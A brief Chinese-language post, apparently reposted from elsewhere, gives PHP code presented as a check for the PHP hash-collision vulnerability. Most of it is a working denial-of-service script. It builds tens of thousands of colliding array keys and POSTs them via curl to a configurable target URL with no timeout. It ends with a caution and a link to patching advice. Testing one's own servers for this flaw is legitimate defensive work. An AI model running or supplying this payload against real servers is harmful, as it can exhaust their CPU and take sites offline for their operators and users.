下面是一段从互联网上转载来的PHP代码,可以用来检测服务器上的PHP是否存在Hash漏洞。
<?php
$size = pow(2, 16);
$array = array();
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://www.xxx.com/index.php"); //修改成你的网站域名
for ($key = 0, $maxKey = ($size - 1) * $size; $key <= $maxKey; $key += $size) {
#$array[$key] = 0;
$argument.="a[".$key."]=0&";
}
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $argument."1=1");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_TIMEOUT, '0');
curl_setopt($ch, CURLOPT_USERAGENT, 'API REQUEST(CURL)');
$return['result'] = curl_exec($ch);
$return['code'] = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
?>
上面的代码请谨慎使用,同时提醒大家尽快修补漏洞,相关的方法请参见:http://www.sunbloger.com/article/224.html